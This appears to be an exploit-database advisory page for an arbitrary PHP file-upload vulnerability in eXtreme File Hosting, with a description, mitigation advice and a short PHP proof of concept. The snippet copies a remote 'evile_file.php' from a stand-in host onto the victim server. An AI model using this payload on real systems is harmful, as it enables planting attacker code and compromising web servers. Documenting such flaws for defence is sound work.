header-logo
Suggest Exploit
vendor:
eXtreme File Hosting
by:
9.8
CVSS
CRITICAL
Arbitrary File Upload
434
CWE
Product Name: eXtreme File Hosting
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Arbitrary File Upload Vulnerability in eXtreme File Hosting

The eXtreme File Hosting application fails to sufficiently sanitize user-supplied input, allowing an attacker to upload and execute arbitrary PHP script code in the context of the affected webserver process. This can lead to the compromise of the application and enable other possible attacks.

Mitigation:

To mitigate this vulnerability, it is recommended to implement strict input validation and file-upload restrictions. Additionally, the web application should properly sanitize user-supplied input to prevent code execution.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/22498/info

eXtreme File Hosting is prone to an arbitrary file-upload vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue could allow an attacker to upload and execute arbitrary PHP script code in the context of the affected webserver process. This may help the attacker compromise the application; other attacks are possible. 

<?php
$file = 'http://sample.com/evile_file.php';
$newfile = 'evile_file.php';
if (!copy($file, $newfile)) {
   echo "failed to copy $file...\n";
}else{
   echo "OK file copy in victim host";
}

Navigation

Suggest Exploit

Services By CQR